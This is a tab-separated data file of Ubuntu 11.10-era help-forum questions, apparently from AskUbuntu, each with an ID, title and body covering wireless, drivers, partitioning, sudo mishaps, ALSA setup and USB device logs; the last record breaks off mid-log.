92510	booting without network configuration	i use a pc and a laptop both on ubuntu 11.10 . pc uses internet with lan cable from adsl modem while laptop uses wifi . only in my laptop i get this message that booting without network configuration . this adds upto my laptop boot up time . my pc having lesser ram boots almost 2 mins faster than laptop . what should i do to overcome this problem ?
92512	connection drops after about 5 seconds and is real slow with a centrino 1030 wireless card	i have a dell xps 15 with dual boot windows 7 ultimate and ubuntu 11.10 and the wireless connection is really bad on ubuntu , i have 2-5mbps in ubuntu and keep losing the connection for 5sec , but in windows i have 20mbps and its good and fast ... i have intel centrino wireless-n 1030 i have tried to turn power management to off and it got up to 7-10mbps so that helped now but i still keep losing the internet connection .
92516	start krusader in a directory from command line	i want to start krusader from terminal in directory /tmp in left panel . how to do it ?
92520	how to install ubuntu from windows xp , vista , 7 , 8 just remotely by single click ?	i have a windows 7 pc running in usa via vnc ( when with a public ip ) , logmein ( when behind complex nat ) remotely i am watching and logged in . but the windows 7 pc does not need windows , it requires ubuntu and i have the permission to do so . but what i do not have is my hands and eyes remotely . so , how can i install ubuntu in a working windows 7 pc , so that after installation it reboot and sends me remote login link in my email . and every-time i have ubuntu .
92521	deleted home directory . please help	firstly just want to say that my issue i have is a result of being pretty stupid when it comes to computers and i 'm sorry to take up people 's time but if anyone could help i would very much appreciate it . my laptop runs nautilus - though i was left this computer by someone so i do n't really know how to work it . anyway , what i wanted to do is change the user name in the log in settings . i thought it was just be pretty simple and straight forward but it was n't and then what i have actually ended up doing is deleting the home directory that had the old name so now when i start up the computer it no longer starts up properly and i ca n't log in properly to even try and fix it . i made a new home folder in the new name and transferred the contents there and then it said 'do you want to delete the old folder - it is ok to do so if you have made a copy in the new folder ' or something like that . so i did . ( i thought this would just change the name - that 's all i wanted to do ) then everything was gone in the original home directory/folder ( for instance when i clicked on any files or pictures on the desktop anywhere it said 'not found ' ) and i got really worried all my stuff was gone but then i found a new folder in the new name that i had created somewhere and that had all my stuff in so i know it is still there . i thought then at least i still have my stuff . anyway , this was until i turned the laptop off . now when i try and turn it on i get the following error pop ups in this order : could not update . iceauthorityfile/home/username.iceauthority /usr/lib/libgconf2-4/gconf-sanity-check-2 was exited with status 256 then it says these folders do n't exist /home/username/desktop , /home/username/.nautilus you need to create the folders or set permissions or something . then it is just a blank background and i ca n't do anything at all . i can only log out , lock the session , shut down , restart etc . but there is just nothing else there . basically , i know this is probably a really stupid problem but i honestly do n't know how to work this system so if anyone can help i would be so grateful . i just need to know how i can get back into the computer to get my stuff . i presume i need to recreate the deleted home folder with the old name . or maybe create the the new folders with the new name ? i honestly do n't know . this all probably did n't make any sense . anyway if anyone can help please let me know . thank you so much !
92528	certified nvidia driver ( from website ) downloaded/installed and still doesnt support any graphics	i just installed the correct driver for my geforce 6600 gt which is called x86 . i had to run it through a ctrl-alt-f1 and stop x server . all went well , so i reboot and it looks like the driver is working ( i had no drivers turned on when i ran this one ) , so all the open gl cairo dock was working well as usual and more . i downloaded hedgewars ( worms ) and flightgear , super choppy . and trust me , its not my video card , they ran perfectly on pardus as well as hon . did i not install the driver correctly ? if not please give me step by step instructions . i enabled one of the proprietery drivers , rebooted , and now there is failure to boot , errors automatic crash report generation ( fail ) lightdm display manager ( fail ) and it 's unable to proceed , how do i disable all drivers within commands ? i have n't installed it using additional drivers , the default drivers that they gave me though , are incorrect . and i am unfamiliar with this program . i disabled all of the proprietary drivers before i ran the install of the nvidia driver from the website , so the screen was glitchy and flickering ( without driver ) and then i ran the install through ctrl-alt-f1 and i rebooted after it said it was successful . and when it rebooted the screen was regular again and no flickers , but it does n't run games i still do n't have the certified nvidia x86 driver under additional drivers .
92536	problem when i check update !	when i try to check updates comes w : failed to fetch http : //ppa.launchpad.net/kayo-k11-4/nv-switcheroo/ubuntu/dists/oneiric/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/kayo-k11-4/nv-switcheroo/ubuntu/dists/oneiric/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . what i must do ?
92541	how to use the chromium spellchecker with other languages than english	i would like to know how to select other languages than english when using the chromium spell checker . when i right click the text-boxes and select other language ( e.g . portuguese ) , english remains the language in use by the spellchecker . thanks , pedro
92543	why do i not have permission to extract any archives ?	i do n't know what happened but all my archives have turned to read only mode . i ca n't extract my archives any more : this is an issue only on ntfs partitions , not home ( the same archive could be extracted in my home folder ) also the `` extract here '' context menu option is missing : what to do ?
92545	unable to locate package battery-status	since upgrading to 11.10. my battery status icon is missing . i 've tried the solutions suggested here , with no luck . in particular , trying to add the alternative package described here , i get the error message unable to locate package battery-status . anyone know how to locate this package ( or indeed how else to get the default battery status icon working ) ?
92546	cyborg r.a.t 3 gaming mouse stops working after a while and/or misbehaves	i 'm having some problems with a new r.a.t 3 gaming mouse that i bought today . it works flawlessly under windows 7 , but under ubuntu 11.10 it keeps misbehaving . what happens is this : i connect the mouse to a usb port . the mouse works as expected for a while . the mouse starts misbehaving : i can still move the pointer around , but it does n't react to clicking any buttons ( at least not right , left , middle , browser forward or browser back ... ) . furthermore , my trackpad starts behaving the same way - moving works , but no clicking . i disconnect the mouse . trackpad starts working again . i re-connect the mouse . it works for a while , before collapsing ( just as the first time i connected it ) . i have n't manually changed any settings anywhere , and i 've noticed that even when the mouse misbehaves , it shows up in cat /proc/bus/input/devices with the following information : i : bus=0003 vendor=06a3 product=0ccc version=0111 n : name= '' saitek cyborg r.a.t 3 mouse '' p : phys=usb-0000:00:1d.0-1.4/input0 s : sysfs=/devices/pci0000:00/00:1d.0/usb2/2-1.4/2-1.4:1.0/input/input18 u : uniq= h : handlers=mouse0 event4 b : prop=0 b : ev=17 b : key=3ff0000 0 0 0 0 b : rel=103 b : msc=10 i 've googled around a bit and found this forum post , but i find it quite messy and it is unclear whether there is actually any solution to my problem in it . also , i feel uncomfortable editing xconf without knowing what i 'm doing - and i 'm quite new on ubuntu , so i do n't know what i 'm doing ... finally , the product web site does n't appear to have any drivers for ubuntu and i 've found no updates available through the standard sources .
92547	can i export all of my modified photos from shotwell ?	shotwell does non-destructive photo editing ( it keeps the original file untouched while keeping a log of actions to generate an edited photo in a database ) . however , i would like to easily backup all of my photos that i edited in shotwell ( what if that database is corrupt ? what if i want to move to a different photo management program ? ) . is there a way to select all modified photos and export them ? this is related to a shotwell bug report ( launchpad , upstream ) currently in-progress , but i am looking for a way to work around that bug right now .
92550	how to log out with a command in a gnome-less environment ?	i installed various window managers ( awesome , dwm , etc . ) from which i am not able to log out back to the login screen ( gnome-session ) in order to switch to another window manager . i need to reboot to do that , which is a waste of time . question how can you log out via the terminal ? did n't work.. dbus-send -- session -- type=method_call -- print-reply -- dest=org.gnome.sessionmanager /org/gnome/sessionmanager org.gnome.sessionmanager.logout uint32:1 ..neither did this : gnome-session-save -- force-logout ..nor that : gnome-session-quit -- force-logout they all returned : failed to call logout : the name org.gnome.sessionmanager was not provided by any .service files is there a quick way to log out back into gnome 's session manager from a non-gnome desktop manager using a terminal emulator ? i know that ctrl+alt+backspace can be configured to restart x , but i 'm looking for the easiest way to log out .
92551	replace windows 7 with ubuntu 11.10 , keep windows d : partition	i have a laptop that came with windows 7 with the drive divided into two partitions , and i have saved my own data on the d : partition . i recently grew annoyed ( after comparing with a wubi installation ) on how bad the windows synaptics touchpad driver works . all my other computers run ( k ) ubuntu , so i thought , why not replace windows with ubuntu ? i 'm wondering , will the normal ubuntu installer keep my other partition intact if i do n't do anything special in the installer ? if not , how should i configure it to nuke everything but the partition with personal data ? thanks in advance . p.s . the wubi installation broke down , by sudo breaking completely . not much to do there , so i un-installed it . no thanks .
92555	what are these `` _embedded.jpg '' files that shotwell created ?	i have a bunch of these `` _embedded.jpg '' files alongside my other originals ( raw + jpeg ) . what are they and why were they created ?
92556	how do i boot into a root shell ?	when booting to the graphical desktop fails we sometimes are recommended to boot into a `` root shell '' or to boot in `` recovery mode '' . how do i do that ?
92562	amd control center does n't save preferences	everytime when i edit the monitor preferences in amd to multi-monitor or to a multidesktop , when i press save or apply the program just closes with no errors and the preferences has n't been saved . if i try to do it via the displays app that is built-in in ubuntu 11.10 i get the following error : the selected configuration for displays could not be applied required virtual size does not fit available size : requested= ( 2560 , 1024 ) , minimum= ( 320 , 200 ) , maximum= ( 1280 , 1280 ) i do n't know if it helps but my graphics card is a ati radeon hd 4800 and my monitors are both 1280x1024 . i 'm running the proprietary driver without post-release updates because i always get an error trying to install that one .
92563	how do i disable automatic monitor detection and adjustment of displays ?	i am running 11.10 on an dell mini 9 ( inspiron 910 ) . when i connect vga or close the lid the computer automatically detects the change and adjusts the displays . how can i disable this ?
92565	how can i configure the mouse scrollwheel sensitivity ?	is there anyway to increase the speed of the wheel scrolling of my mouse in ubuntu ? i use extended files ( pdfs , web pages etc ) and i need to quickly look through them . i read somewhere that kubuntu has this option in preference panel mouse but ubuntu does n't so i 'm stuck .
92566	how can i run a unlock.exe file to decrypt a western digital hard disk ?	as i 'm a first time user i does n't how to use ubuntu 11.10 . before my os installation i backed up all the files in a western digital hard disk which is password protected . after i finished my installation i ca n't get access to my hard-disk because it has a program which is called unlock.exe and i ca n't open it , so please help me with a solution . also i had used wine windows program loader , and the error message generated was `` the application has encountered an unexpected error and it is exiting now '' . so what shall i do ?
92568	how to share notes in ubuntu one ?	is it possible to share notes over ubuntu one with a public link like in google docs ? i found a solution here but it does not work anymore . is there a solution ?
92570	how can i dual boot ubuntu alongisde windows 7 's guid gpt partition ?	i have windows 7 sp1 installed on my machine that uses guid gpt partition instead of the old mbr . when i try dual booting ubuntu with it , ubuntu does n't recognize the operating system - basically it sees all of my hdd space as unallocated . how can i dual boot ubuntu with windows 7 keeping the guid gpt partition ?
92572	how do i setup a bluehost email account ?	i have an bluehost 's account email and recently i have installed ubuntu 11.10 . now i want to setup my account in evolution or thunderbird but i ca n't it . i do n't know if problem is about the settings or client email ca n't connect with the server imap .
92583	why do n't my partitions stay mounted after a reboot ?	i 'm using ubuntu 11.10 in a wubi instalation . as i 'm using clementine to listen to music i have in my partitions , each time i power ubuntu up clementine loses the libraries and has to rescan the partition all over again . a similar thing happens to transmission bittorrent client ... each time i shutdown the computer and power it up again it loses the location of the files if they are in one of the partitions ... . is there a way to fix this problem ? is it normal ?
92585	disable detection of certain hardware ?	i have a computer with two pci tv cards . one is compro ( win friendly ) , another is leadtek ( linux friendly ) . now , i 'm trying to optimize my ubuntu boot process and i would like to disable detection of my compro card because it 's not working on linux , it wo n't work and even if it does , i do n't care . sometimes , i 'm using ... alterative ... os so removing compro card from case is not an option . is there any way to tell linux `` ignore any hardware placed there ( appropriate pci slot ) '' ? my dmesg concerning tv card detection looks like this : 1.933868 ] cx88/0 : cx2388x v4l2 driver version 0.0.8 loaded [ 1.933885 ] cx8800 0000:05:01.0 : pci int a - > gsi 19 ( level , low ) - > irq 19 [ 1.935571 ] cx88 [ 0 ] : your board is n't known ( yet ) to the driver . you can [ 1.935573 ] cx88 [ 0 ] : try to pick one of the existing card configs via [ 1.935574 ] cx88 [ 0 ] : card= < n > insmod option . updating to the latest [ 1.935575 ] cx88 [ 0 ] : version might help as well . [ 1.936574 ] cx88 [ 0 ] : here is a list of valid choices for the card= < n > insmod option : [ 1.936890 ] cx88 [ 0 ] : card=0 - > unknown/generic [ 1.937089 ] cx88 [ 0 ] : card=1 - > hauppauge wintv 34xxx models [ 1.937328 ] cx88 [ 0 ] : card=2 - > gdi black gold [ 1.937519 ] cx88 [ 0 ] : card=3 - > pixelview [ 1.937690 ] cx88 [ 0 ] : card=4 - > ati tv wonder pro [ 1.937890 ] cx88 [ 0 ] : card=5 - > leadtek winfast 2000xp expert [ 1.938137 ] cx88 [ 0 ] : card=6 - > avertv studio 303 ( m126 ) [ 1.938366 ] cx88 [ 0 ] : card=7 - > msi tv- @ nywhere master [ 1.938586 ] cx88 [ 0 ] : card=8 - > leadtek winfast dv2000 [ 1.938803 ] cx88 [ 0 ] : card=9 - > leadtek pvr 2000 [ 1.939004 ] cx88 [ 0 ] : card=10 - > iodata gv-vcp3/pci [ 1.939211 ] cx88 [ 0 ] : card=11 - > prolink playtv pvr [ 1.939417 ] cx88 [ 0 ] : card=12 - > asus pvr-416 [ 1.939603 ] cx88 [ 0 ] : card=13 - > msi tv- @ nywhere [ 1.939799 ] cx88 [ 0 ] : card=14 - > kworld/vstream xpert dvb-t [ 1.940040 ] cx88 [ 0 ] : card=15 - > dvico fusionhdtv dvb-t1 [ 1.940264 ] cx88 [ 0 ] : card=16 - > kworld ltv883rf [ 1.940460 ] cx88 [ 0 ] : card=17 - > dvico fusionhdtv 3 gold-q [ 1.940691 ] cx88 [ 0 ] : card=18 - > hauppauge nova-t dvb-t [ 1.940917 ] cx88 [ 0 ] : card=19 - > conexant dvb-t reference design [ 1.941174 ] cx88 [ 0 ] : card=20 - > provideo pv259 [ 1.941367 ] cx88 [ 0 ] : card=21 - > dvico fusionhdtv dvb-t plus [ 1.941605 ] cx88 [ 0 ] : card=22 - > pchdtv hd3000 hdtv [ 1.941812 ] cx88 [ 0 ] : card=23 - > digitalnow dntv live ! dvb-t [ 1.942055 ] cx88 [ 0 ] : card=24 - > hauppauge wintv 28xxx ( roslyn ) models [ 1.942329 ] cx88 [ 0 ] : card=25 - > digital-logic microspace entertainment center ( mec ) [ 1.942651 ] cx88 [ 0 ] : card=26 - > iodata gv/bctv7e [ 1.942851 ] cx88 [ 0 ] : card=27 - > pixelview playtv ultra pro ( stereo ) [ 1.943123 ] cx88 [ 0 ] : card=28 - > dvico fusionhdtv 3 gold-t [ 1.943354 ] cx88 [ 0 ] : card=29 - > ads tech instant tv dvb-t pci [ 1.943599 ] cx88 [ 0 ] : card=30 - > terratec cinergy 1400 dvb-t [ 1.943842 ] cx88 [ 0 ] : card=31 - > dvico fusionhdtv 5 gold [ 1.944075 ] cx88 [ 0 ] : card=32 - > avermedia ultratv media center pci 550 [ 1.944352 ] cx88 [ 0 ] : card=33 - > kworld v-stream xpert dvd [ 1.944584 ] cx88 [ 0 ] : card=34 - > ati hdtv wonder [ 1.944779 ] cx88 [ 0 ] : card=35 - > winfast dtv1000-t [ 1.944982 ] cx88 [ 0 ] : card=36 - > avertv 303 ( m126 ) [ 1.945191 ] cx88 [ 0 ] : card=37 - > hauppauge nova-s-plus dvb-s [ 1.945430 ] cx88 [ 0 ] : card=38 - > hauppauge nova-se2 dvb-s [ 1.945657 ] cx88 [ 0 ] : card=39 - > kworld dvb-s 100 [ 1.945857 ] cx88 [ 0 ] : card=40 - > hauppauge wintv-hvr1100 dvb-t/hybrid [ 1.946132 ] cx88 [ 0 ] : card=41 - > hauppauge wintv-hvr1100 dvb-t/hybrid ( low profile ) [ 1.946452 ] cx88 [ 0 ] : card=42 - > digitalnow dntv live ! dvb-t pro [ 1.952195 ] cx88 [ 0 ] : card=43 - > kworld/vstream xpert dvb-t with cx22702 [ 1.952253 ] input : at translated set 2 keyboard as /devices/platform/i8042/serio0/input/input2 [ 1.957988 ] cx88 [ 0 ] : card=44 - > dvico fusionhdtv dvb-t dual digital [ 1.963725 ] cx88 [ 0 ] : card=45 - > kworld hardwarempegtv xpert [ 1.969424 ] cx88 [ 0 ] : card=46 - > dvico fusionhdtv dvb-t hybrid [ 1.975040 ] cx88 [ 0 ] : card=47 - > pchdtv hd5500 hdtv [ 1.980535 ] cx88 [ 0 ] : card=48 - > kworld mce 200 deluxe [ 1.986008 ] cx88 [ 0 ] : card=49 - > pixelview playtv p7000 [ 1.991482 ] cx88 [ 0 ] : card=50 - > npg tech real tv fm top 10 [ 1.997005 ] cx88 [ 0 ] : card=51 - > winfast dtv2000 h [ 2.002538 ] cx88 [ 0 ] : card=52 - > geniatech dvb-s [ 2.008027 ] cx88 [ 0 ] : card=53 - > hauppauge wintv-hvr3000 trimode analog/dvb-s/dvb-t [ 2.013714 ] cx88 [ 0 ] : card=54 - > norwood micro tv tuner [ 2.019407 ] cx88 [ 0 ] : card=55 - > shenzhen tungsten ages tech te-dtv-250 / swann oem [ 2.025299 ] cx88 [ 0 ] : card=56 - > hauppauge wintv-hvr1300 dvb-t/hybrid mpeg encoder [ 2.031338 ] cx88 [ 0 ] : card=57 - > ads tech instant video pci [ 2.037373 ] cx88 [ 0 ] : card=58 - > pinnacle pctv hd 800i [ 2.043379 ] cx88 [ 0 ] : card=59 - > dvico fusionhdtv 5 pci nano [ 2.049444 ] cx88 [ 0 ] : card=60 - > pinnacle hybrid pctv [ 2.055525 ] cx88 [ 0 ] : card=61 - > leadtek tv2000 xp global [ 2.061631 ] cx88 [ 0 ] : card=62 - > powercolor ra330 [ 2.067686 ] cx88 [ 0 ] : card=63 - > geniatech x8000-mt dvbt [ 2.073779 ] cx88 [ 0 ] : card=64 - > dvico fusionhdtv dvb-t pro [ 2.079891 ] cx88 [ 0 ] : card=65 - > dvico fusionhdtv 7 gold [ 2.085954 ] cx88 [ 0 ] : card=66 - > prolink pixelview mpeg 8000gt [ 2.092031 ] cx88 [ 0 ] : card=67 - > kworld plustv hd pci 120 ( atsc 120 ) [ 2.098160 ] cx88 [ 0 ] : card=68 - > hauppauge wintv-hvr4000 dvb-s/s2/t/hybrid [ 2.104363 ] cx88 [ 0 ] : card=69 - > hauppauge wintv-hvr4000 ( lite ) dvb-s/s2 [ 2.104366 ] cx88 [ 0 ] : card=70 - > tevii s460 dvb-s/s2 [ 2.104368 ] cx88 [ 0 ] : card=71 - > omicom ss4 dvb-s/s2 pci [ 2.104370 ] cx88 [ 0 ] : card=72 - > tbs 8920 dvb-s/s2 [ 2.104372 ] cx88 [ 0 ] : card=73 - > tevii s420 dvb-s [ 2.104374 ] cx88 [ 0 ] : card=74 - > prolink pixelview global extreme [ 2.104375 ] cx88 [ 0 ] : card=75 - > prof 7300 dvb-s/s2 [ 2.104377 ] cx88 [ 0 ] : card=76 - > sattrade st4200 dvb-s/s2 [ 2.104379 ] cx88 [ 0 ] : card=77 - > tbs 8910 dvb-s [ 2.104381 ] cx88 [ 0 ] : card=78 - > prof 6200 dvb-s [ 2.104383 ] cx88 [ 0 ] : card=79 - > terratec cinergy ht pci mkii [ 2.104384 ] cx88 [ 0 ] : card=80 - > hauppauge wintv-ir only [ 2.104386 ] cx88 [ 0 ] : card=81 - > leadtek winfast dtv1800 hybrid [ 2.104388 ] cx88 [ 0 ] : card=82 - > winfast dtv2000 h rev . j [ 2.104390 ] cx88 [ 0 ] : card=83 - > prof 7301 dvb-s/s2 [ 2.104392 ] cx88 [ 0 ] : card=84 - > samsung smt 7020 dvb-s [ 2.104394 ] cx88 [ 0 ] : card=85 - > twinhan vp-1027 dvb-s [ 2.104395 ] cx88 [ 0 ] : card=86 - > tevii s464 dvb-s/s2 [ 2.104398 ] cx88 [ 0 ] : subsystem : 185b : e000 , board : unknown/generic [ card=0 , autodetected ] , frontend ( s ) : 0 [ 2.104401 ] cx88 [ 0 ] : tv tuner type -1 , radio tuner type -1 i know , i wo n't see any speedup benefit from disabling that detection , but those lines appear before plymouth splash and i do n't like it : \
92589	changing groups as nonadmin	recently , i accidently lowered my privledges on ubuntu . i was trying to add vboxusers group to my account , and quickly googled to fund out i can add groups by sudo usermod -g vboxusers user unaware this would remove all my groups , i used this command and now i ca n't use sudo to change back because i am not an admin . i already tried logging in as root . it did n't work this is the only user account on the machine . i need admin privledges . what do i do ?
92592	are there any desktop clients for soundcloud ?	does anyone know a good desktop client for soundcloud ( are there any ) ? if not complete feature support then at least a player which can integrate and play soundcloud account songs . i found jamcloud , but it runs using adobe air and adobe air is no longer supported for linux , furthermore if possible i want to avoid using wine to run adobe air .
92594	evolution does n't work with university wireless network	i 'm fairly new to the linux world , specifically to ubuntu 11.10 . i started using evolution mail to put all my email accounts , calendars and life in order , but for some reason it can not update anything when i 'm using my university 's wireless connection . the same happened when i used outlook ( back when i used windows ) . i can not figure out what the problem is . i even disable the ip blocklist i put transmission bittorrent and nothing . what can i do ? i really need evolution to update constantly or else i 'm screwed here . i 'd really appreciate anyone 's help . ikki f .
92596	how to make the led in usb stick blink only when accessed ?	in ubuntu with gui i plug the flash drive into usb port , and is automatically mounted , the led turns on and off the thumb drive that is to be checked . in ubuntu server ( text mode , without gui ) i connect the pen drive is checked and the same non-stop , not for your led blinking , even after mounting the pen drive the led continues to blink . could someone tell me how do i mount the pen drive on ubuntu server , but with the same settings of the graphical ubuntu-desktop ? actually i want to do the same on ubuntu server configurations mounting pen drive ubuntu-desktop or flash drive that led to only stay lit when it is accessed .
92597	sudo -i only allows one argument	is this normal ? > sudo -u misc -i `` ls '' note test tmp > sudo -u misc -i `` ls ~ '' -bash : ls ~ : command not found > sudo -u misc -i `` ls ~ '' -bash : ls ~ : command not found > sudo -u misc -i `` foo=bar '' [ misc ] anything that 's got a space in it seems to be interpreted as a single command , which is unrecognised . even weirder , setting any environment variable drops me into the other user 's account . how can i run those commands as expected ?
92601	mathematica does n't open over freenx	i followed the great advice given to me earlier , and installed a freenx server on my office computer ( fedora ) and nomachine 's client on my laptop ( ubuntu 11.10 ) . this indeed works great , accept for two problems : all software works great , including matlab , but mathematica refuses to open . it also refused to do so over x . here 's the error message : i ca n't close the session . it does n't bug too much because i can kill it from the console or through nomachine 's session administrator , but neither the close button nor alt-f4 do n't work . maybe this means that i did n't configure everything as i should have ?
92604	default media behavior	i am using 11.10 with gnome shell . when i insert an audio cd - it opens up banshee . i would like it to open up exaile . i have set exaile as the default media player using system settings- > default applications but it does seen to work . any ideas ?
92610	i created a separate /home partition , is this a good idea ?	i have a question that i do not know exactly how to address , so i 'm deeply sorry if this one has already been posted by other users . i 'm an extremely newbie with linux , but very eager to learn . yesterday i installed ubuntu 11.10 on my notebook ( it works like a charm ) , however , i 'm not so sure about the way i configured my hard disk partitions . the way i used to do with windows was to have the os installed at c : \ partition , and then leave a d : \ partition so i could keep all my documents , media and so on things . well , i tried to do the same with ubuntu . i created a partition where i attributed as my / and another one ext4 and just let it be . but , as soon as i hit 'next ' on the install wizard it said something about not attributing that second partition as anything . so , i thought i would n't be able to use it if i did n't attribute it to something . then i decided that setting it as /home would be a good choice , since all my personal things and downloaded stuffs go to there . but right now i 'm wondering if i did the right thing . i mean , if i need to format my computer in the future , will i loose all my things at /home ? if yes , how can i fix that problem without having to reinstall ubuntu again ?
92613	how do i remove the separators from the gnome panel ?	the separators that are displayed in the gnome panel for certain themes are really ugly looking and i 'd like to find out how to remove them completely ( either by somehow modifying the panel separator image file , or by completely removing it ) . i 'm running ubuntu 10.10 and using the radiance theme . here is an example image ( i split the image because it would be too wide for this page otherwise ) : if someone knows how to remove these and can teach me how , it would be greatly appreciated !
92619	how do i compile alsa 1.0.24 ?	i 'm using ubuntu maverick on my main pc , and i got the system configured just the way i like it ( yay ! ) a long time ago . everything was well until the recent wine releases which are apparently made to use alsa 1.0.24 which is sadly not available for maverick . this means i lost all sound in wine , which is not nearly as funny as it should be ! i found this tutorial on how to build alsa 1.0.24 , but i 'm not sure if the procedure is `` safe enough '' to use . by `` safe enough '' i mean `` will it mess up my system beyond repair '' . is the big red-lettered disclaimer in the beginning of the article justified ? how dangerous is the procedure described ? should i risk it and give it a shot or just bite the bullet and install mint from scratch , like i did on my laptop ( successfully , it seems ) ? update : after following gilles ' advice below about trying to install alsa binaries for lucid , i had a bit of a problem with sound being blocked for other apps when playing something in flash . to fix this , i did the following : create /etc/asound.conf with the following content : pcm.pulse { type pulse } ctl.pulse { type pulse } pcm . ! default { type pulse } ctl . ! default { type pulse } then simply restart alsa with the following command : sudo alsa reload i found all this on this forum thread but chose to restart alsa instead of the whole system , and it worked !
92623	how do i get a dane-elec mp3/mp4 player working ?	my mp3/mp4 does not plug-in and play and therefore i can not transfer any file to the mp3/mp4 dane-elec music my touch or only dane-elec with 8 gb in memory and perhapses model zt1 with radio , ..and microsdhc card slot following the above link the mp3/mp4 is there and it is mp3 player : touch my music and the complete information is on this site http : //www.danedigital.com/8-music-media-players/2-music-touch.html as the technical specifications mp3 player : touch my music the mp4 player has a very classy . it allows its users to play music and view photos and video . his fluent interface , its touch-pad , his radio and rds micro sdhc reader makes him a very complete device will become the ideal musical companion . ubuntu i am with is ubuntu 11.10 kernel 3.0.0-14-generic the latest i tried to install many applications but nothing worked . with disk utility i can see that ubuntu can recognize something , that as a peripheral device named rockchip usbdisk user and rockchip usbdisk sd , and i can plug and play other devices , and only this mp3/mp4 do not connect to the computer with ubuntu and the device as no problem working disconnected to computer i try to see if work on windows and it does ! i can see the device and transfer files to the mp3/mp4 dane-elec folder device and use fat32 . so why can not do on ubuntu ! ? what can i do and why does not work on ubuntu ? what is wrong with it ? here are the logs : jan 4 17:27:34 a-ubuntu kernel : [ 141.948863 ] init : apport pre-start process ( 1970 ) terminated with status 1 jan 4 17:27:34 a-ubuntu kernel : [ 141.963202 ] init : apport post-stop process ( 1994 ) terminated with status 1 jan 4 17:30:02 a-ubuntu kernel : [ 289.564049 ] usb 2-4 : new high speed usb device number 3 using ehci_hcd jan 4 17:30:02 a-ubuntu kernel : [ 289.988706 ] usbcore : registered new interface driver uas jan 4 17:30:02 a-ubuntu kernel : [ 289.992056 ] initializing usb mass storage driver ... jan 4 17:30:02 a-ubuntu kernel : [ 289.992272 ] scsi6 : usb-storage 2-4:1.0 jan 4 17:30:02 a-ubuntu kernel : [ 289.993082 ] usbcore : registered new interface driver usb-storage jan 4 17:30:02 a-ubuntu kernel : [ 289.993088 ] usb mass storage support registered . jan 4 17:30:03 a-ubuntu kernel : [ 290.996887 ] scsi 6:0:0:0 : direct-access rockchip usbdisk user 1.00 pq : 0 ansi : 0 jan 4 17:30:03 a-ubuntu kernel : [ 290.997372 ] scsi 6:0:0:1 : direct-access rockchip usbdisk sd 1.00 pq : 0 ansi : 0 jan 4 17:30:03 a-ubuntu kernel : [ 290.997478 ] scsi : killing requests for dead queue jan 4 17:30:03 a-ubuntu kernel : [ 291.002712 ] scsi : killing requests for dead queue jan 4 17:30:03 a-ubuntu kernel : [ 291.002880 ] scsi : killing requests for dead queue jan 4 17:30:04 a-ubuntu kernel : [ 291.016249 ] scsi : killing requests for dead queue jan 4 17:30:04 a-ubuntu kernel : [ 291.032252 ] scsi : killing requests for dead queue jan 4 17:30:04 a-ubuntu kernel : [ 291.048182 ] scsi : killing requests for dead queue jan 4 17:30:04 a-ubuntu kernel : [ 291.060178 ] scsi : killing requests for dead queue jan 4 17:30:04 a-ubuntu kernel : [ 291.060357 ] scsi : killing requests for dead queue jan 4 17:30:04 a-ubuntu kernel : [ 291.080381 ] sd 6:0:0:0 : attached scsi generic sg2 type 0 jan 4 17:30:04 a-ubuntu kernel : [ 291.080646 ] sd 6:0:0:1 : attached scsi generic sg3 type 0 jan 4 17:30:04 a-ubuntu kernel : [ 291.088381 ] sd 6:0:0:0 : [ sdb ] 16015360 512-byte logical blocks : ( 8.19 gb/7.63 gib ) jan 4 17:30:04 a-ubuntu kernel : [ 291.088988 ] sd 6:0:0:1 : [ sdc ] attached scsi removable disk jan 4 17:30:04 a-ubuntu kernel : [ 291.200050 ] usb 2-4 : reset high speed usb device number 3 using ehci_hcd jan 4 17:30:04 a-ubuntu kernel : [ 291.448044 ] usb 2-4 : reset high speed usb device number 3 using ehci_hcd jan 4 17:30:04 a-ubuntu kernel : [ 291.696055 ] usb 2-4 : reset high speed usb device number 3 using ehci_hcd jan 4 17:30:04 a-ubuntu kernel : [ 291.832046 ] sd 6:0:0:0 : [ sdb ] test wp failed , assume write enabled jan 4 17:30:04 a-ubuntu kernel : [ 291.832994 ] sd 6:0:0:0 : [ sdb ] asking for cache data failed jan 4 17:30:04 a-ubuntu kernel : [ 291.833001 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through jan 4 17:30:04 a-ubuntu kernel : [ 291.834378 ] sdb : detected capacity change from 8199864320 to 0 jan 4 17:30:04 a-ubuntu kernel : [ 291.835367 ] sd 6:0:0:0 : [ sdb ] attached scsi removable disk jan 4 17:30:06 a-ubuntu kernel : [ 293.004741 ] sd 6:0:0:0 : [ sdb ] 16015360 512-byte logical blocks : ( 8.19 gb/7.63 gib ) jan 4 17:30:06 a-ubuntu kernel : [ 293.116051 ] usb 2-4 : reset high speed usb device number 3 using ehci_hcd jan 4 17:30:21 a-ubuntu kernel : [ 308.228043 ] usb 2-4 : device descriptor read/64 , error -110 jan 4 17:30:36 a-ubuntu kernel : [ 323.444072 ] usb 2-4 : device descriptor read/64 , error -110 jan 4 17:30:36 a-ubuntu kernel : [ 323.660047 ] usb 2-4 : reset high speed usb device number 3 using ehci_hcd jan 4 17:30:51 a-ubuntu kernel : [ 338.772085 ] usb 2-4 : device descriptor read/64 , error -110 jan 4 17:31:06 a-ubuntu kernel : [ 353.988064 ] usb 2-4 : device descriptor read/64 , error -110 jan 4 17:31:07 a-ubuntu kernel : [ 354.204058 ] usb 2-4 : reset high speed usb device number 3 using ehci_hcd jan 4 17:31:12 a-ubuntu kernel : [ 359.224115 ] usb 2-4 : device descriptor read/8 , error -110 jan 4 17:31:17 a-ubuntu kernel : [ 364.344136 ] usb 2-4 : device descriptor read/8 , error -110 jan 4 17:31:17 a-ubuntu kernel : [ 364.560037 ] usb 2-4 : reset high speed usb device number 3 using ehci_hcd jan 4 17:31:22 a-ubuntu kernel : [ 369.580132 ] usb 2-4 : device descriptor read/8 , error -110 jan 4 17:31:27 a-ubuntu kernel : [ 374.700126 ] usb 2-4 : device descriptor read/8 , error -110 jan 4 17:31:27 a-ubuntu kernel : [ 374.804121 ] usb 2-4 : usb disconnect , device number 3 jan 4 17:31:27 a-ubuntu kernel : [ 374.804518 ] sd 6:0:0:0 : device offlined - not ready after error recovery jan 4 17:31:27 a-ubuntu kernel : [ 374.804600 ] sd 6:0:0:0 : [ sdb ] no caching mode page present jan 4 17:31:27 a-ubuntu kernel : [ 374.804606 ] sd 6:0:0:0 : [ sdb 